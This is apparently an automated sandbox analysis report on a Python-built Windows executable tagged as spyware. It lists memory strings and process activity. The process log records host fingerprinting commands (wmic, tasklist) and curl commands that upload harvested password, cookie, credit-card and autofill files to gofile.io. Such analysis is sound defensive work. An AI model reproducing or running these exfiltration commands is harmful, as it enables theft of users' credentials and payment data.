Source: main.exe, 00000002.00000003.1928933984.000001ED8D916000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937262511.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1963159329.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904841401.000001ED8D8A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924011561.000001ED8D8A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/Spe
Source: main.exe, 00000002.00000003.1931699271.000001ED8D7A0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: main.exe, 00000002.00000003.1911242619.000001ED8C19C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C19E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910532956.000001ED8C186000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938242403.000001ED8C1B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
Source: main.exe, 00000002.00000002.1958325647.000001ED8CD90000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958768124.000001ED8D150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: main.exe, 00000000.00000003.1725416360.00000237BBB35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://palletsprojects.com/donate
Source: main.exe, 00000002.00000002.1955752914.000001ED8C330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: main.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958768124.000001ED8D150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: main.exe, 00000002.00000003.1928106222.000001ED8C85C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933219260.000001ED8C85F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776106217.000001ED8C854000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928251806.000001ED8C85E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908531123.000001ED8C843000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1773191821.000001ED8C85F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1912041561.000001ED8C859000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771266961.000001ED8C303000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771384864.000001ED8C313000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1772006423.000001ED8C852000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771266961.000001ED8C2EB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C82C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771168685.000001ED8C838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: main.exe, 00000002.00000002.1958325647.000001ED8CD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
Source: main.exe, 00000002.00000003.1950132310.000001ED8C1DD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926306346.000001ED8C905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927037674.000001ED8C9A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8C8F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924390284.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909775081.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779284915.000001ED8C94D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C9B6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909516582.000001ED8C97F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779822300.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910632349.000001ED8C832000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8C93A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C82C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924841077.000001ED8C904000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907334349.000001ED8C1D8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C967000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: main.exe, 00000002.00000003.1909775081.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931582451.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956891756.000001ED8C8D1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925908854.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908319790.000001ED8C8C0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907240963.000001ED8C8BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941474977.000001ED8D837000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938307594.000001ED8D82F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938854162.000001ED8D832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931211381.000001ED8D840000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962816126.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949750996.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1942764256.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935223138.000001ED8C092000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907726569.000001ED8C091000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1948555943.000001ED8D4EC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928758587.000001ED8D4EB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930983104.000001ED8D4EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: main.exe, 00000002.00000002.1956147178.000001ED8C670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
Source: main.exe, 00000002.00000002.1962378008.000001ED8D7AC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930325157.000001ED8D7A9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931699271.000001ED8D7AC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: main.exe, 00000002.00000003.1911763765.000001ED8C052000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927114013.000001ED8C065000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924130073.000001ED8C053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962573654.000001ED8D804000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946091649.000001ED8D34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: main.exe, 00000002.00000003.1756603875.000001ED8C09B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1756807255.000001ED8C0AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952715008.000001ED8BBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D38E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904551547.000001ED8D391000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935034726.000001ED8D393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961913080.000001ED8D715000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926815697.000001ED8D710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: main.exe, 00000002.00000003.1914711565.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925966743.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CB4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958011767.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1936495508.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1957482809.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906717397.000001ED8CB5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA67BD40_2_00007FF6ABA67BD4
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA61B380_2_00007FF6ABA61B38
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA480200_2_00007FF6ABA48020
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA66E700_2_00007FF6ABA66E70
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA56CF00_2_00007FF6ABA56CF0
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA50D180_2_00007FF6ABA50D18
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA544500_2_00007FF6ABA54450
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA524200_2_00007FF6ABA52420
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA53B880_2_00007FF6ABA53B88
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA62AE40_2_00007FF6ABA62AE4
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5132C0_2_00007FF6ABA5132C
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA6531C0_2_00007FF6ABA6531C
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5EB240_2_00007FF6ABA5EB24
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4A26D0_2_00007FF6ABA4A26D
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA49A340_2_00007FF6ABA49A34
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA6A9980_2_00007FF6ABA6A998
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA670EC0_2_00007FF6ABA670EC
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA511280_2_00007FF6ABA51128
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4989B0_2_00007FF6ABA4989B
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA527B80_2_00007FF6ABA527B8
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5EFB80_2_00007FF6ABA5EFB8
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA590200_2_00007FF6ABA59020
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA537500_2_00007FF6ABA53750
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5173C0_2_00007FF6ABA5173C
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA53F8C0_2_00007FF6ABA53F8C
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA596D00_2_00007FF6ABA596D0
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA50F1C0_2_00007FF6ABA50F1C
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5F6380_2_00007FF6ABA5F638
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA676880_2_00007FF6ABA67688
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA61B380_2_00007FF6ABA61B38
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA64E800_2_00007FF6ABA64E80
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA48DC00_2_00007FF6ABA48DC0
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5AE200_2_00007FF6ABA5AE20
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA515380_2_00007FF6ABA51538
Source: C:\Users\user\Desktop\main.exeCode function: String function: 00007FF6ABA41E50 appears 53 times
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.drStatic PE information: No import functions for PE file found
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
Source: main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
Source: main.exe, 00000000.00000003.1729176986.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
Source: main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs main.exe
Source: main.exe, 00000002.00000002.1952863479.000001ED8BCB0000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs main.exe
Source: classification engineClassification label: mal68.spyw.evad.winEXE@37/137@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642Jump to behavior
Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\main.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeVirustotal: Detection: 23%
Source: C:\Users\user\Desktop\main.exeFile read: C:\Users\user\Desktop\main.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"Jump to behavior
